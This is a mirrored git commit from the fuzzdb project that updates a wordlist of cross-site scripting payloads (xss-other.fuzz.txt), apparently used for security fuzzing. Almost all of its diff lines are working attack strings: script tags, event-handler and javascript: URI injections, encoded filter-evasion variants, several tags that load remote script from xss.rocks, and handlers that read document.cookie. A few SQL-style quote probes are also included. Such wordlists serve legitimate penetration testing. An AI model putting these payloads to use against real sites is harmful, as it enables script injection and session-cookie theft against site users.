mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-23 03:23:03 +00:00
Update xss-other.fuzz.txt
This commit is contained in:
parent
a949e4e409
commit
ea0b7142c2
1 changed files with 46 additions and 31 deletions
|
@ -1,42 +1,57 @@
|
|||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
||||
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
||||
<img src=x:x onerror=alert(1)>
|
||||
javascript:alert(1)
|
||||
alert(1)
|
||||
alert
|
||||
'
|
||||
<font style='color:expression(alert('XSS'))'>
|
||||
' or 2=2
|
||||
"
|
||||
" or 202
|
||||
";eval(unescape(location))//# %0Aalert(0)
|
||||
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
alert(1)
|
||||
alert(1)
|
||||
alert`1`
|
||||
alert\\`1\\`
|
||||
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
&#39;&#88;&#83;&#83;&#39;&#41;>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<img src=x:x onerror=alert(1)>
|
||||
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
||||
<SCRIPT SRC=//xss.rocks/.j>
|
||||
'); alert('XSS
|
||||
\";alert('XSS');//
|
||||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
<a onmouseover="alert(document.cookie)">xxs link</a>
|
||||
<a onmouseover=alert(document.cookie)>xxs link</a>
|
||||
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
||||
<IMG SRC= onmouseover="alert('xxs')">
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
<body onLoad="alert('XSS');"
|
||||
<body onunload="javascript:alert('XSS');">
|
||||
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
|
||||
<iframe src=http://xss.rocks/scriptlet.html <
|
||||
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
||||
<IMG onmouseover="alert('xxs')">
|
||||
<img src=x onerror="javascript:alert('XSS')">
|
||||
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
||||
&#39;&#88;&#83;&#83;&#39;&#41;>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC= onmouseover="alert('xxs')">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
||||
<IMG SRC=java%00script:alert(\"XSS\")>
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
||||
<SCRIPT SRC=//xss.rocks/.j>
|
||||
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<iframe src=http://xss.rocks/scriptlet.html <
|
||||
\";alert('XSS');//
|
||||
<img src="javascript:alert('XSS')">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=java%00script:alert(\"XSS\")>
|
||||
<img src=x onerror="javascript:alert('XSS')">
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
||||
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
||||
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||
<script>alert('XSS');</script>
|
||||
alert
|
||||
alert(1)
|
||||
alert(1)
|
||||
alert\\`1\\`
|
||||
alert`1`
|
||||
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||
javascript:alert%28/xss/%29
|
||||
";eval(unescape(location))//# %0Aalert(0)
|
||||
javascript:alert(1)
|
||||
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
||||
|
|
Loading…
Reference in a new issue